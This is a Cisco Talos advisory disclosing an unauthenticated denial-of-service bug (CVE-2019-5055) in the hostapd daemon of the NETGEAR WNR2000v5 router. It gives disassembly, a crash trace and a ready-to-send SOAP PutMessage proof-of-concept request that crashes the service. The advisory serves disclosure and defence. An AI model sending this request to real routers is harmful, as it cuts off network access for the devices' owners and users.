Talos Vulnerability Report

TALOS-2019-0832

NETGEAR N300 WNR2000v5 unauthenticated host access point daemon denial-of-service vulnerability

September 9, 2019
CVE Number

CVE-2019-5055

Summary

An exploitable denial-of-service vulnerability exists in the Host Access Point Daemon (hostapd) on the NETGEAR N300 (WNR2000v5) wireless router. A SOAP request sent in an invalid sequence to the <WFAWLANConfig:1#PutMessage> service can cause a null pointer dereference, resulting in the hostapd service crashing. An unauthenticated attacker can send a specially-crafted SOAP request to trigger this vulnerability.

Tested Versions

NETGEAR N300 WNR2000v5 Firmware Version V1.0.0.70

Product URLs

https://www.netgear.com/support/product/WNR2000v5

CVSSv3 Score

 7.5 - CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

CWE

CWE-730:  Denial of Service

Details

The NETGEAR n300 is a small, affordable wireless router with minimal features.

When a specific SOAP request is sent to the hostapd daemon, webconnectioncheckdata() calls another function wpsprocess_msg() with invalid arguments under certain conditions.

0x44e5d4 <webconnectioncheckdata+2372>: lw a0,20(s1) 0x44e5d8 <webconnectioncheckdata+2376>: move a1,zero => 0x44e5dc <webconnectioncheckdata+2380>: jalr t9 // call wpsprocessmsg() 0x44e5e0 <webconnectioncheckdata+2384>: move a2,v0

The problem is that there is no validation to determine if M1 data has been received. This is normally performed by the GetDeviceInfo() method:

POST /wps_control HTTP/1.1
SOAPAction: "urn:schemas-wifialliance-org:service:WFAWLANConfig:1#GetDeviceInfo"
Content-type: text/xml
Content-Length: 320

<?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><SOAP-ENV:Body>.<m:GetDeviceInfo xmlns:m="urn:schemas-wifialliance-org:service:WFAWLANConfig:1">.</m:GetDeviceInfo></SOAP-ENV:Body></SOAP-ENV:Envelope>

This method will populate a structure later passed to wpsprocessmsg. However, if GetDeviceInfo() has not been called by a client since the daemon started, it will crash when attempting to dereference the structure passed passed to this function.

  0044e5d4     lw                  a0,0x14(s1)         // $a0 == 0x00
  0044e5d8     clear               a1
  0044e5dc     jalr                t9=>wps_process_msg
  0044e5e0     _move               a2,v0

Crash Information

Program received signal SIGSEGV, Segmentation fault.
0x0043cc7c in ?? ()

   0x43cc70 <wps_get_msg+24>:   lw  t9,-31756(gp)
   0x43cc74 <wps_get_msg+28>:   jr  t9
   0x43cc78 <wps_get_msg+32>:   nop
=> 0x43cc7c <wps_process_msg>:  lw  v0,4(a0)          // Crash
   0x43cc80 <wps_process_msg+4>:    lui gp,0x49
   0x43cc84 <wps_process_msg+8>:    beqz    v0,0x43cc94 <wps_process_msg+24>
   0x43cc88 <wps_process_msg+12>:   addiu   gp,gp,6416
   0x43cc8c <wps_process_msg+16>:   b   0x43cc98 <wps_process_msg+28>
   0x43cc90 <wps_process_msg+20>:   lw  t9,-30984(gp)


peda-mips > x/32xw $a0
0x0:    Cannot access memory at address 0x0

peda-mips > bt
#0  0x0043cc7c in wps_process_msg ()
#1  0x0044e5e4 in web_connection_check_data ()
#2  0x004515fc in httpread_read_handler ()
#3  0x00421ff8 in eloop_sock_table_dispatch ()
#4  0x004226ec in eloop_run ()
#5  0x00408068 in main ()

Exploit Proof of Concept

# Send to <router_ip>:49152
POST /wps_control HTTP/1.1
SOAPAction: "urn:schemas-wifialliance-org:service:WFAWLANConfig:1#PutMessage"
Host: 192.168.1.1:49152
Content-Type: text/xml
Content-Length: 357

<?xml version="1.0"?>
<SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
<SOAP-ENV:Body>
.<m:PutMessage xmlns:m="urn:schemas-wifialliance-org:service:WFAWLANConfig:1">
<NewInMessage>AAAA</NewInMessage>
.</m:PutMessage>
</SOAP-ENV:Body>
</SOAP-ENV:Envelope>

Timeline

2019-05-08 - Vendor Disclosure
2019-09-09 - Public Release

Credit

Discovered by Dave McDaniel of Cisco Talos.